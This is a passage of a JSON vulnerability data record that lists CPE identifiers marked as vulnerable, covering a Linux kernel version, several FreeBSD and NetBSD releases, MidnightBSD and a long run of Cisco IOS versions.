                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.5:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:1.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:midnightbsd:midnightbsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:10.3\\(19a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(11d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(2\\)xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(36\\)cc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(24a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2wa3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(7\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(9\\)p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(8\\)sa5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(10\\)bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(14\\)gs2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2\\)xc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14\\)st:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)s8a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)sl6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(x\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(8\\)db2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3wa4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(36\\)ca4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(16\\)ia:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(24\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2gs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(4\\)xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(19a\\)gs6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(9\\)xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\)s3b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\)xa3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.0\\(22a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(13\\)aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(28a\\)ct:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(28a\\)ia:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(17\\)ct:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(23a\\)bc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(11\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(13\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(11a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(12\\)s3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(10\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)st1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)w5\\(22b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)st2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)s10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)st5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)st:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(24\\)s5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(30\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0wt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0wc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0wx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)wx5\\(15a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ew1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(2\\)xf4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(2\\)xf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)sx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(23\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(24\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28\\)s5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(30\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc3b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xe2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\)e10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)dc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(23\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ez2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)st6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)sc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(22\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(25\\)w5-27d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(27\\)sv1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3.3\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)e5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10.5\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)xk2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(7\\)t3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)eo1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)eo3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)e5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)ew4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(16\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(2\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)ew4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7a\\)ey3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)ya:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yf4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yh3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ea2c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xr2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)t12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)ey:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)xz7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)xz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ey:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ez:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ye:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zd4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)ja1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12.05\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)yx1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14.5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)za8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)yv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)db1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)xt3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8\\)ea2b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\)ex3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ay:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1da:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xe3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)t15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)sl1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)t16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12g\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sz2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)s14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)yp1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6.5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yi1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ey:*:*:*:*:*:*:*",
